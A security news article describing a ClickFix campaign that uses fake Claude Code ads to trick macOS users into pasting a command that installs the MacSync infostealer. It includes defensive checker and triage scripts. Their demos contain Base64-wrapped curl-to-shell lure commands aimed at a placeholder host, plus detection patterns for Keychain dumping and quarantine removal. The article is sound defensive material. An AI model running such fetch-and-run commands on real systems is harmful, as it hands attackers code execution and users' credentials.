ClickFix Campaign via Google Ads: How Hackers Exploit Claude's Popularity to Target macOS

New Wave of Attacks on Apple Users

Cybercriminals have begun exploiting the popularity of Anthropic's AI tools to distribute malware. This time the targets are developers and technical professionals searching for Claude Code, Anthropic's command-line coding agent. The attackers buy sponsored placements in Google Ads so that their phishing pages appear above the genuine results.

The Mechanics of a ClickFix Attack

The ClickFix method is not new, but its adaptation to macOS is becoming increasingly polished. A user searching for Claude Code lands on a site that imitates a content-display error or a failed installer. To 'fix' the problem, the page tells the user to copy a command and paste it straight into the macOS Terminal. This is the point of compromise: the command runs with the user's own privileges (and with root privileges if the user types a sudo password when prompted), and because nothing is downloaded as a .dmg or .pkg, the Gatekeeper and notarization checks that would apply to a conventional installer never fire.

How the Malicious Script Operates

The command the user copies is usually disguised as a legitimate package-manager or repository fetch, or as a system utility. Once executed, it:

  • Establishes a connection to a remote command-and-control (C2) server.
  • Searches the Keychain for saved passwords.
  • Steals session tokens from popular browsers (Chrome, Safari, Firefox).
  • Collects system information and hardware identifiers.

Comparison: Legitimate Tool vs. Fake

Parameter                Original Claude Code                        Malicious version (ClickFix)
Download source          Official npm registry                       Google Ads sponsored links
Installation method      npm install -g @anthropic-ai/claude-code    Obfuscated script, often Base64-encoded
Permission requirements  Standard user permissions                   Prompts for sudo or Keychain access
Outcome                  Working AI coding assistant                 Credential theft and backdoor installation
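
The following pre-flight check is an added example written for this article; it is not code from Malwarebytes Labs, from Anthropic, or from the campaign itself. It takes the text a page asks you to paste, decodes any Base64-looking tokens one level deep (the wrapping noted in the table above), and greps both the visible command and the decoded text for the markers the two previous sections describe: fetching a script and piping it straight into a shell, Base64 decoding, sudo, Keychain queries, osascript, and removal of the quarantine attribute. The function names (inspect_command, decode_b64_blobs) and the pattern list are hypothetical heuristics rather than a signature, and the sample lure is constructed, with its hidden payload pointing at example.invalid, a reserved name that never resolves.

```shell
#!/bin/sh
# Added example: check a command copied from a web page BEFORE pasting it into
# Terminal. Not code from Malwarebytes, Anthropic or the campaign; the pattern
# list is a hypothetical set of heuristics, not a detection signature.

# One grep -E pattern per line. [|] is a literal pipe character.
SUSPICIOUS_PATTERNS='(curl|wget)[^|;]*[|][[:space:]]*(sudo[[:space:]]+)?(bash|zsh|sh)
base64[[:space:]]+(-d|-D|--decode)
(^|[[:space:]])sudo[[:space:]]
security[[:space:]]+(find-(generic|internet)-password|dump-keychain)
osascript
xattr[[:space:]]+-[a-z]*d[a-z]*[[:space:]]+com\.apple\.quarantine
(^|[[:space:]])(eval|nohup)[[:space:]]
/tmp/|/private/tmp/|/var/tmp/'

# decode_b64_blobs: read text on stdin, decode every token that looks like
# Base64 (20+ chars) one level deep, and print the printable result.
decode_b64_blobs() {
  grep -oE '[A-Za-z0-9+/]{20,}={0,2}' | while IFS= read -r blob; do
    # GNU base64 uses -d; older macOS builds only accept -D.
    { printf '%s' "$blob" | base64 -d 2>/dev/null \
        || printf '%s' "$blob" | base64 -D 2>/dev/null; } | tr -cd '[:print:]\n'
    echo
  done
}

# inspect_command "<command text>": print every matching indicator.
# Returns 0 when nothing matched, 1 when the command should not be run.
inspect_command() {
  cmd=$1
  # Inspect the command as written plus whatever its Base64 blobs hide.
  expanded=$(printf '%s\n' "$cmd"; printf '%s\n' "$cmd" | decode_b64_blobs)
  hits=0
  while IFS= read -r pat; do
    [ -n "$pat" ] || continue
    if printf '%s\n' "$expanded" | grep -qiE -- "$pat"; then
      printf '  [!] matches: %s\n' "$pat"
      hits=$((hits + 1))
    fi
  done <<EOF
$SUSPICIOUS_PATTERNS
EOF
  if [ "$hits" -eq 0 ]; then
    printf '  [ok] no ClickFix indicators (still read it before running)\n'
    return 0
  fi
  printf '  [!] %d indicator(s): do not paste this into Terminal\n' "$hits"
  return 1
}

# --- demo input (constructed for this example) -----------------------------
LEGIT='npm install -g @anthropic-ai/claude-code'
# A lure in the ClickFix style: the blob decodes to a fetch-and-pipe command
# aimed at example.invalid, a reserved name that never resolves.
LURE_PAYLOAD='curl -fsSL https://example.invalid/fix.sh | bash'
LURE="echo $(printf '%s' "$LURE_PAYLOAD" | base64 | tr -d '\n') | base64 -d | bash"

for c in "$LEGIT" "$LURE"; do
  printf 'inspecting: %s\n' "$c"
  inspect_command "$c" || true
done
```

Save it as a script and call inspect_command with the copied text in single quotes; a non-zero exit means stop. The genuine install command passes clean, while the constructed lure is flagged twice: once for the base64 -d in the visible text and once for the curl ... | bash hidden inside the blob.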

The MacSync Infostealer and Its Capabilities

Security researchers have found that the main purpose of the current campaign is to deliver an infostealer called MacSync. This macOS-specific stealer targets cryptocurrency wallets, passwords for corporate services, and two-factor authentication data. By delivering the lure through Google Ads instead of email, the attackers never have to get past a spam filter, and they inherit the trust that users place in top search results.

Technical Indicators of Compromise

If you have already run a suspicious command in Terminal, look for the following signs:

  • Unknown processes in Activity Monitor that generate network traffic.
  • Permission prompts for sensitive folders (Documents, Desktop) from utilities you do not recognize.
  • Changed DNS settings or new configuration profiles under System Settings.
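
The first-hour triage script below is an added example, not code from Malwarebytes Labs or Anthropic, that turns the list above into commands. The live checks use only stock macOS tools (lsof, scutil, profiles, ls) and are skipped on other systems. scan_launch_items goes one step further than the list and looks through the standard launchd persistence directories for plists whose program arguments carry the same kind of markers as the lure itself; the article does not say how MacSync persists, so treating LaunchAgents as the place to look is a general macOS assumption rather than a finding about this campaign. The function names and indicator list are hypothetical, and the two plists in the demo are constructed for illustration.

```shell
#!/bin/sh
# Added triage example; not code from Malwarebytes, Anthropic or the campaign.
# Run on the affected Mac as the user who pasted the command.

# Markers worth a second look inside a launchd plist (grep -E alternation).
PLIST_INDICATORS='base64|curl|wget|osascript|/tmp/|/var/tmp/|nohup|\.sh'

# scan_launch_items DIR...: print "plist<TAB>markers" for every plist in the
# given directories that matches; return 0 if any did, 1 otherwise.
scan_launch_items() {
  found=1
  for dir in "$@"; do
    [ -d "$dir" ] || continue
    for plist in "$dir"/*.plist; do
      [ -f "$plist" ] || continue
      # plutil -p also renders binary plists; off macOS fall back to raw text.
      text=$(plutil -p "$plist" 2>/dev/null || cat "$plist")
      match=$(printf '%s\n' "$text" | grep -oE "$PLIST_INDICATORS" | sort -u | tr '\n' ' ')
      if [ -n "$match" ]; then
        printf '%s\t%s\n' "$plist" "$match"
        found=0
      fi
    done
  done
  return "$found"
}

# macos_live_checks: the quick look the indicator list above describes.
# Uses only stock macOS tools; prints a notice and does nothing elsewhere.
macos_live_checks() {
  if [ "$(uname)" != Darwin ]; then
    printf '(live checks skipped: not macOS)\n'
    return 0
  fi
  printf '== processes with open network sockets (command, pid, endpoint) ==\n'
  lsof -nP -i 2>/dev/null | awk 'NR > 1 { print $1, $2, $9 }' | sort -u
  printf '== DNS resolvers in use ==\n'
  scutil --dns | grep 'nameserver' | sort -u
  printf '== configuration profiles (user scope; run with sudo for system) ==\n'
  profiles list 2>/dev/null
  printf '== launch items, newest first ==\n'
  ls -lt ~/Library/LaunchAgents /Library/LaunchAgents /Library/LaunchDaemons 2>/dev/null | head -20
}

# --- demo: two constructed LaunchAgent plists in a temp directory ------------
demo=$(mktemp -d)
cat > "$demo/com.example.benign.plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.benign</string>
  <key>ProgramArguments</key><array><string>/usr/bin/true</string></array>
</dict></plist>
EOF
# Constructed to resemble a dropper's persistence entry: a neutral-looking
# name running a Base64-wrapped fetch from a reserved, non-resolving domain.
blob=$(printf '%s' 'curl -fsSL https://example.invalid/a | sh' | base64 | tr -d '\n')
cat > "$demo/com.example.updater.plist" <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>echo $blob | base64 -d | sh</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>
EOF

printf '== suspicious launch items (demo directory, then the real locations) ==\n'
scan_launch_items "$demo" ~/Library/LaunchAgents /Library/LaunchAgents /Library/LaunchDaemons \
  || printf '(none flagged)\n'
macos_live_checks
rm -rf "$demo"
```

Anything scan_launch_items prints deserves a look at the full plist and at the binary it launches; an entry that pulls content from the network or decodes a blob at login has no business in a developer's LaunchAgents folder. The live section is deliberately read-only so it can be run before any cleanup and its output kept as evidence.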

Security Recommendations

To minimize risk, experts advise skipping sponsored results in search engines when downloading professional software. Verify the site's URL (it must belong to anthropic.com), install only with the command given in the official documentation, and never paste a command from a web page into Terminal without reading it first. If you suspect infection, immediately change every password stored in the browser and Keychain, rotate any API keys and tokens kept on the machine, and revoke active sessions on critical services.

Source: Malwarebytes Labs

About The Author

Pavlo Zaslonov

Cybersecurity expert, knows everything about IP hiding and modern chatbot vulnerabilities.
